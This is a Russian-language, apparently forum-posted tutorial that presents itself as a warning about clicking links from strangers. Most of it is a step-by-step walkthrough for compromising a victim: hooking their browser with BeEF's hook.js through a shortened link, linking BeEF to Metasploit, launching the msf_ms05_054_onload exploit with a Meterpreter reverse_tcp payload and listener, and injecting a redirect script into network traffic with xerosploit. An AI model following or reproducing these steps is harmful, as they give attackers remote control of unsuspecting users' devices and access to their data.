Введение.
Каждый раз когда вы переходите по ссылке от неизвестного вам человека, задумывались ли вы о всей опасности того что вы сделали?
Переходя по ссылке вы можете не подозревать, но на вашем устройстве после перехода могут находится вредоносные программы а ваши персональные данные могут быть похищены. Сегодня мы на примерах убедимся во всей опасности...
- Первое что может случится при переходе по ссылке это то, что злоумышленник получет доступ к вашим аккаунтам социальных сетей.
- Могут узнать ваш IP. И если вы думаете что это не страшно, то вы глубоко ошибаетесь.
- Подгрузить малварь используя exploit pack.
На мой взгляд, это самое серьезное что может произойти. Ну что, меньше теории больше практики)
Подгружаем малварь.
Exploit pack - это своеобразная связка эксплойтов.
К прибольшому сожалению я не буду показывать в этой теме использование exploit pack'а. По той простой причине, что огонь это не игрушка. Но мы все равно завладеем всем устройством пользователя когда он перейдет по ссылке. А поможет нам сегодня beef в связке с metasploit. Этот способ я придумал совсем недавно.
Beef - это фреймворк для проведения XSS атак путем заражения и дальнейшего использования.
Metasploit - фреймворк для поиска и эксплоутации уязвимостей. То есть для проветения тестирования на проникновение.
Запуск beef.
В терминале пишем
beef-xss
Переходим по ссылке http://127.0.0.1:3000/ui/authentication
Теперь нужно авторизироватся. Логин и пароль по умолчанию beef:beef.
Нам нужно чтобы "жертва" выполнила у себя скрипт hook.js
Нужно подгрузить его ей.
http://<ваш ip>:3000/demos/basic.html
Далее сократите ссылку и скиньте пользователю. Как только он переходит по ссылке на панели управления beef в разделе Online browsers появится активный браузер. Это браузер нашего пользователя.
Половина дел сделано. Теперь подключим к нашей работе metasploit. Для этого:
- Открываем файл config.yaml у beef. Часто он находится в этой дериктории - /usr/share/beef-xss/
- Ищем там раздел extension. У metasploit меняем значение параметра на true
- Теперь же открываем файл /usr/share/beef-xss/extensions/metasploit/config.yaml и изменяем значение параметров у callback_host и host.
- Запускаем metasploit и пишем следующее
msf> load msgrpc
И снова открываем файл из пункта 3. В pass вписываем получившийся с генерированный пароль. Остается сохранить.
Переходим в /usr/share/beef-xss/ и пишем
./beef -x
После этого в beef загрузятся exploit'ы.
Теперь нам доступны exploit'ы которые мы тоже подгрузить пользователю и выполнить их. Для начала я хотел бы узнать какая ОС у моего пользователя.
И как видно на скриншоте - это windows.
Теперь переходим во вкладку Commands и ищем - msf_ms05_054_onload
Выберем payload. Так как у моей "жертвы" windows я выбрал - windows/meterpreter/reverse_tcp
Заполняем все поля.
Теперь открываем msf и пишем
1. use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST <your_ip>
4. exploit
Во второй команде пишете название пайлоада который выбрали в beef. Вот и все)
А пользователь всего-то перешел по ссылке.
А что если пользователь придерживается правил "я по незнакомым ссылкам не хожу"? На этот случай у нас имеется еще один ответ. Создаем файл hack.js с таким содержимым:
<script>
document.location.href="http://<your ip>:3000/demos/basic.html";
</script>
Запускаем xerosploit. И выбираем:
scan --> ip жертвы --> injectjs --> run --> путь до hack.js
Далее проделываем выше описанное.Вот так мы взломали не о чем не подозревающего пользователя. Будьте осторожны друзья)
Вывод
Не стоит переходить по ссылкам от незнакомцев, это может нанести критический вред вашему устройству. А представьте себе если залить hook.js на уязвимый к xss веб ресурс? Последствия просто ужасны. Надеюсь вам понравилась данная статья!